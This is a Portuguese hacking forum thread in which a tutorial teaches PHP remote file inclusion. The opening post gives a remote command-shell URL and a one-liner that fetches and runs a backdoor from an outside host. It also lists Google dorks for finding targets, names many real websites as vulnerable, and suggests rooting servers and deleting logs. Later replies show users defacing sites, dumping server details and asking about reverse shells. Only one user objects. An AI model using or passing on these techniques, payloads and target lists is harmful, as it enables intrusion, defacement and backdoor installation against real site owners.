PHP Injection - O Fim das Dúvidas

[Bruno Candido]

Bom, muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais comum entre defacers/owners.
A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam 'includes' para ajudar na criação do seu site sem fazer nenhuma verificação das 'strings'
Um exemplo de um site vulneravel, com 3 partes em uma tabela:

include('topo.php');
include('menu.php');
include($page);

Existem várias strings, a mais comum é page..
Então um endereço ficticio: http://www.alvo.com.br/index.php?page=novidades.php
Neste exemplo ele carregaria a página novidades.php do site.. Se ela for vulneravel dá para 'injetar' páginas maliciosas que executam comandos na maquina que roda o site (por isso o nome PHP Injection)

Estarei usando esse script como referencia (chamado de cmd):

http://kmzrox.by.ru/cmd.gif?&cmd=ls
Obviamente você tentaria: http://www.alvo.com.br/index.php?page=h ... if?&cmd=ls
Ops! Se a página for vulneravel ela vai carregar! Se ela funcionar e não estiver em safe mode (uma opção do php.ini) vai listar os arquivos do site (comando ls).
Não é só isso, a partir daqui você usa a sua criatividade, rodar backdoor para ter acesso remoto (por telnet/putty), pacotar pessoas e servers, configurar psybnc, etc.. Só precisará saber alguns comandos de Linux/FreeBSD/SunOS..

Backdoor: kmzrox.by.ru/r0nin
Para usar coloque no 'cmd' cd /tmp;wget kmzrox.by.ru/r0nin;chmod 777 r0nin;./r0nin
entra na pasta tmp, baixa a backdoor (exploit), coloca permissão para o arquivo e roda ele
Por exemplo: http://www.alvo.com.br/index.php?page=h ... in;./r0nin

Se tudo ocorrer bem e não tiver firewall agora vá iniciar > executar > telnet http://www.alvo.com.br 1666, pronto, você está na maquina, enjoy! :~)

Para procurar no google as páginas separei uma lista de chaves, lembrando que você pode usar inurl:".pt" (escolhendo a classe do dominio) para procurar páginas somente de um país.

allinurl:".php?page="
allinurl:".php?inc="
allinurl:".php?body="
allinurl:".php?main="
allinurl:".php?pag="
allinurl:".php?p="
allinurl:".php?content="
allinurl:".php?cont="
allinurl:".php?c="
allinurl:".php?meio="
allinurl:".php?x="
allinurl:".php?cat="
allinurl:".php?site="
allinurl:".php?m="
allinurl:".php?do="
allinurl:".php?x="
allinurl:".php?content="
allinurl:".php?pagina="
allinurl:".php?root="
allinurl:".php?include="
allinurl:".php?open="
allinurl:".php?visualizar="
allinurl:".php?conf="

Achará varios sites, a maioria no padrão:

http://www.interreg3c.net/sixcms/list.php?page=home_en
http://www.ourdocuments.gov/content.php?page=milestone
http://www.safer-networking.org/index.php?page=mirrors
http://www.serviceandinclusion.org/inde ... e=nat_conf

Agora é simples, você tem os sites pra procurar e uma cmd, agora é só ir de página em página substituindo os valores da string page para o cmd que vai usar :}
Você pode utilizar exploits para tentar conseguir root (super user) na máquina, assim ter permissão para fazer TUDO com os sites que estão dentro dela, apagar todos os logs, etc.
Aqui vai uma lista de páginas vulneraveis (depois de ler isso vocês já saberão o que fazer), a maioria está protegida ou com firewall, é só para mostrar o que vai acontecer quando uma página é vulneravel :~)

http://www.imobmarques.com.br/pagina.php?pagina=
http://www.effectingchange.luton.ac.uk/ ... p?content=
http://www.tourtrans.ru/index.php?page=
http://www.iobchody.unas.cz/index.php?page=
http://www.balustrady.cz/index.php?page=
http://www.kubela.iglu.cz/index.php?inc=
http://www.engelking-elektronik.de/index.php?main=valor
http://www.mob.hu/cgi-bin/index.php?main=valor
http://www.medianlg.hu/index.php?site=
http://www.spillo.it/home.php?main=
http://www.fdf-k22.dk/index.php?main=
http://www.astro.up.pt/investigacao/con ... .php?page=
http://www.nyinvestmentproperties.com/index.php?main=
http://www.timetoupgrade.us/index.php?main=
http://www.msgames.msu.ac.th/reading.php?page=
http://www.mobilink.com.tr/index.php?page=
http://www.slh.org.tw/tw/index.php?page=
http://www.climb.idv.tw/index.php?page=
http://www.azsrc.com/index.php?page=

Páginas com passthru() bloqueados, quando não aparece nada na box são ignorados, pode continuar procurando :B
Estou só compartilhando meus conhecimentos, se alguem tiver alguma coisa para complementar :}


Sem mais :arrow:



(LINKS EDITADOS, AGORA TODAS AS EXPLOITS ESTÃO NO AR)

--
Editado por -RoCk-.

Cmd's on, aproveitem:
http://www.room-escape-games.com/

[Bruno Candido]

sim wackygoose, jaja vou copiar e botar num host meu
eauhehea
ta feio esse /sougay :P

[jokerbr]

dsoul gostei mt do seu topico e agradeço tb por compartilhar essas dicas com a galera. sou novo aqui no forum e me registrei agora justamente pra começar a participar aki e aprender com a galera.

bom minha duvida é simples, procurei alguns sites no google com algumas dessas chaves, e outras q bolei aki, inseri a url do exploit junto ao site e tudo.. alguns ocorreram alguns erros, outros nao apareceram nada..
a minha duvida é o seguinte, toda vez q executo o telnet http://www.site.com 1666 seja la qual for, ele diz q ta conectando, logo depois fecha a janela do telnet do nada.. como sou noob ainda, gostaria de perguntar c isso é normal quando nao funciona.

abraços pra galera.

[Bruno Candido]

hm.. as vezes é normal o erro sim, uma espécie de proteção..
o erro seria 'cannot fork by pty' ou 'no more pty's available'?
^^
se for isso tenta rodar reversa.. precisa de netcat.. se tiver interessado depois me manda pm! :}

[Quicky]

daew dsoul... tu que manja disso.. podes me responder algo bem simples?

tipo... eu jí fiz um deface (A) mas tipo.. nao rootei a shell nao.. só pus o meu index e renomei o index original pra index2. e deixei os arquivos.. pois bem.. caso eu quisesse rootar.. como faria??

sysname: Linux
nodename: ux01.9netweb.it
release: 2.4.20-28.7smp
version: #1 SMP Thu Dec 18 11:18:31 EST 2003
machine: i686
Script Current User: ux011148
PHP Version: 4.1.1
User Info: uid(1401) euid(1401) gid(1401)
Current Path: /ux01/1/148/public_html/PHP-Nuke/modules/My_eGallery/public
Server IP: 66.71.135.148
Web Server: Apache/1.3.28 (Unix) mod_perl/1.29

[jokerbr]

cara to comecando a entender essa parada de php injection, nao consegui fazer esse lance ai de entrar pelo tel net, mas ja consegui acessar o phpmyadmin de um site.

usei o comando ls na url pra listar, dai apareceu os arquivos e diretorios, dai tentei entrar no diretorio de administracao, so q ai tava blokeado, usei o chmod 777 novamente ee... abriu ^^ gostei ^^

[jokerbr]

consegui renomear o index.php pra indexnoob.php de u m site, agora nao to conseguindo enviar o arquivo pelo wget

[jokerbr]

hun, dsoul, no caso intao o exploit so seria instalado c o site aceitasse o wget, alguns ate listam os aquivos com 'ls' mas nao funciona o wget. abraços.

[rog]

consegui renomear o index.php pra indexnoob.php de u m site, agora nao to conseguindo enviar o arquivo pelo wget

vc nao tem vergonha nao ??

:roll:

o dono do site te fez algo ?
ele te deve algo ?

fique sabendo que a requesta invasor esta logada como todas requestas apache e que podes ser punido por isso

fazer um leech numa falha e da uma de cracker

=

essa atituda faze vc entrar na categoria de lammerz


rog

[jokerbr]

consegui renomear o index.php pra indexnoob.php de u m site, agora nao to conseguindo enviar o arquivo pelo wget

vc nao tem vergonha nao ??

:roll:

o dono do site te fez algo ?
ele te deve algo ?

fique sabendo que a requesta invasor esta logada como todas requestas apache e que podes ser punido por isso

fazer um leech numa falha e da uma de cracker

=

essa atituda faze vc entrar na categoria de lammerz


rog

uia cara nao precisa ficar nervoso ^^ eu realterei o nome pra index.php fica trank.. so fiz pra ver c funcionava...
eu trabalho desenvolvendo websites tb, c alguem apagar ou estragar um website meu e eu nao ter backup ia ficar mt triste.. nao kero prejudicar ning, a nao ser alguem q me prejudique ou keria prejudicar os outros.

espero q entenda.. to aki so por fundo educacional, curiosidade.